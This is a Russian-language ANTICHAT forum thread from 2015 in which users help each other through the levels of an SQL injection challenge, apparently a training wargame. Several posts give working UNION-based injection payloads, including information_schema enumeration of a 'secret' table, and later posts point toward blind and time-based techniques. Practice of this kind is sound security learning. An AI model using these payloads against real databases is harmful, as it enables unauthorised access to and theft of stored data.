ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.03.2015, 10:14
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
Провел на форуме:
12164
Репутация:
1
|
|
Очень интересный челлендж. Завис на 4 уровне.
select * from users where id=2' union select 1,ggg,3 from secret -- or login='$text' limit 1
А дальше как действовать?
|
|
|
27.03.2015, 14:49
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от billybonse
Очень интересный челлендж. Завис на 4 уровне.
select * from users where id=2' union select 1,ggg,3 from secret -- or login='$text' limit 1
А дальше как действовать?
' union select * from secret where ggg='abc'--
только ппц как условие звучит.." найти ДАННОЕ таблицы"
|
|
|
|
27.03.2015, 15:03
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
Провел на форуме:
12164
Репутация:
1
|
|
Сообщение от UXOR
' union select * from secret where ggg='abc'--
только ппц как условие звучит.." найти
ДАННОЕ
таблицы"
Спасибо. Вот именно условие меня и смутило...
|
|
|
|
29.03.2015, 15:51
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437
Репутация:
-2
|
|
Как пройти 5 левел вроде делаю правильний запрос, но все равно ошибка
' union select table_name from information_schema.tables where table_name='secret'--
|
|
|
|
29.03.2015, 16:24
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от teh
Как пройти 5 левел вроде делаю правильний запрос, но все равно ошибка
' union select table_name from information_schema.tables where table_name='secret'--
Ну раз ты пошел таким путем, тогда так
'union+select+column_name,2,3+from+information_sch ema.columns+where+table_name='secret'+--+
в итоге: 'union+select+dfgfddfgdfdfdf,dfgdfgfdg,null+from+s ecret+--+
но, можно и проще:'union+select+*,null+from+secret+--+
|
|
|
|
29.03.2015, 17:07
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437
Репутация:
-2
|
|
Сообщение от smirk
Ну раз ты пошел таким путем, тогда так
'union+select+column_name,2,3+from+information_sch ema.columns+where+table_name='secret'+--+
в итоге: 'union+select+dfgfddfgdfdfdf,dfgdfgfdg,null+from+s ecret+--+
но, можно и проще:'union+select+*,null+from+secret+--+
почему union select 1,2,3 ? там ж, только 2 поля
|
|
|
|
29.03.2015, 20:51
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437
Репутация:
-2
|
|
А как 8 левел пройти? Пасс думаю там в числово буквенном виде. А выводиться только то, что произошла какая-то ошибка, или количество выведенных записей. что тогда делать?
|
|
|
|
29.03.2015, 21:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от teh
А как 8 левел пройти? Пасс думаю там в числово буквенном виде. А выводиться только то, что произошла какая-то ошибка, или количество выведенных записей. что тогда делать?
варианта два. либо true (когда нет ошибки), либо false (есть ошибка). на что похоже?
|
|
|
|
29.03.2015, 21:12
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437
Репутация:
-2
|
|
на слепую? Но как то пасс узнать
|
|
|
|
29.03.2015, 23:49
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от psihoz26
Дошел до 10 и понял что alexbers полный извращенец!!
Этож надо юзеров заставлять blind и time based скули руками крутить!
А кто тебя заставляет руками крутить?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
